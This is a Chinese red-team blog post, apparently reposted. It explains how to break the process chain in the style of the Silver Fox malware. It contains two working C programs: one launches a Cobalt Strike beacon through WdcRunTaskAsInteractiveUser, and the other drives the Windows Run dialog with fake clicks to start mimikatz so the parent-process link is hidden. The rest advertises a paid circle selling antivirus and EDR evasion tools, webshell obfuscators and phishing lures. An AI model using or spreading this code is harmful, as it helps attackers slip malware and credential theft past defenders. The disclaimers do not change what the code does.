文章总结: 本文介绍银狐手法进程链绕过技术,通过WdcRunTaskAsInteractiveUser接口函数和模拟按键操作实现权限提升,提供具体代码示例和免杀工具推广,强调仅限于安全测试用途。 综合评分: 65 文章分类: 红队,免杀,内网渗透,安全工具,渗透测试
银狐手法进程链绕过思路
原创
Hello888 Hello888
安全天书
2026年4月21日 16:46 广西
在小说阅读器读本章
去阅读
本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!
WdcRunTaskAsInteractiveUser接口函数
HRESULT WINAPI WdcRunTaskAsInteractiveUser( LPCWSTR pwszCmdLine, // 要执行的命令行 LPCWSTR pwszPath, // 工作目录路径 DWORD dwDummy // 保留参数(必须为0));
实现代码
#include <windows.h>#include <stdio.h>int main(){
CoInitialize(0);
HMODULE hWdc = LoadLibraryA("wdc.dll"); if (!hWdc) { printf("无法加载 wdc.dll\n"); CoUninitialize(); return 1; }
typedef DWORD(WINAPI* WdcRunTaskFn)(LPCWSTR, LPCWSTR, DWORD); WdcRunTaskFn pfnWdcRunTask = (WdcRunTaskFn)GetProcAddress(hWdc, "WdcRunTaskAsInteractiveUser"); if (!pfnWdcRunTask) { printf("找不到 WdcRunTaskAsInteractiveUser 函数\n"); FreeLibrary(hWdc); CoUninitialize(); return 1; } printf("找到函数: 0x%p\n", pfnWdcRunTask);
Sleep(1000);
DWORD result = pfnWdcRunTask( L"C:\\beacon_x64.exe", // 程序路径 L"C:\\", // 工作目录 0 // 保留参数 ); // 7. 清理 FreeLibrary(hWdc); CoUninitialize(); return 0;}
模拟按键操作实现
#include <iostream>#include <Windows.h>int main(){ SHELLEXECUTEINFOA shellexecute = { 0 }; shellexecute.cbSize = sizeof(shellexecute); shellexecute.fMask = 1024; shellexecute.lpVerb = "open"; shellexecute.lpFile = "Shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}"; shellexecute.nShow = 1; ShellExecuteExA(&shellexecute);
// 延时,确保运行窗口打开 Sleep(100);
HWND FindW = FindWindowA("#32770", "运行"); HWND FindWEx = FindWindowExA(FindW, 0, "ComboBox", 0);//定位输入子窗口 FindW = FindWindowExA(FindW, 0, "Button", "确定");//定位确定按钮 SendMessageA(FindWEx, WM_SETTEXT, 0, (LPARAM)"C:\\mimikatz.exe"); HWND FindWs = FindW;
SendMessageA(FindW, WM_LBUTTONDOWN, 1u, 0);//模拟鼠标左键按下
SendMessageA(FindWs, WM_LBUTTONUP, 0, 0);//模拟鼠标左键释放
SendMessageA(FindWs, WM_COMMAND, 1u, 0);
return 0;}
红蓝偶像练习生小圈子
更多工具思路文章请加入纷传,圈子主要研究方向渗透测试、红蓝对抗、钓鱼手法思路、武器化,红队工具二开与免杀。圈内不定期分享红队技术文章,攻防经验总结以及自研工具与插件,目前圈子已满300人,欢迎各位进圈子交流学习!
**圈子目前更新相关技术文章:
* HeavenlyBypassAV内部版工具-轻松免杀各大杀软
-
HeBypassAV内部版Patch免杀工具-轻松绕过杀软EDR
-
Heavenly自动化红队后渗透工具免杀生成器
-
Heavenly白加黑自动化生成免杀工具
-
HeavenlyProtectionCS内部CS插件
-
冰蝎webshell免杀工具
-
哥斯拉webshell免杀工具
-
红队场景下lnk钓鱼Bypass免杀AV
-
Frp免杀隧道工具
-
1day和0dayPOC
-
lnk钓鱼思路视频讲解
-
lnk钓鱼Bypass天擎
-
msi钓鱼
-
chm钓鱼
-
Kill360核晶
-
AV对抗-致盲AV(核晶)
-
捆绑免杀360
-
Kill火绒
-
火绒6.0内存免杀
-
kill-windows Defender
-
Defender分离免杀
-
Defender知识点
-
EDR对抗思路
-
进程注入知识点
-
自启动思路
-
多种维权手法
-
Fscan免杀核晶
-
QVM解决思路
-
红队思路-钓鱼环境下小窗口截屏窃取
-
免杀Todesk/向日葵读取工具
-
渗透测试文章思路
-
内网对抗文章思路
-
*还有更多红队工具文章!期待您的加入!!!*
往期推荐**
安全天书免杀课来袭|助力实战免杀钓鱼(文末送福利)
Patch免杀0检测!!!绕过卡巴斯基、360、Defender、火绒等
【红队工具】红队内网后渗透CobaltStrike插件更新
全新版本–Heavenly自动化生成白加黑2.0版本
绕过360安全卫士实现维权****
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安全天书 Hello888 Hello888《银狐手法进程链绕过思路》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论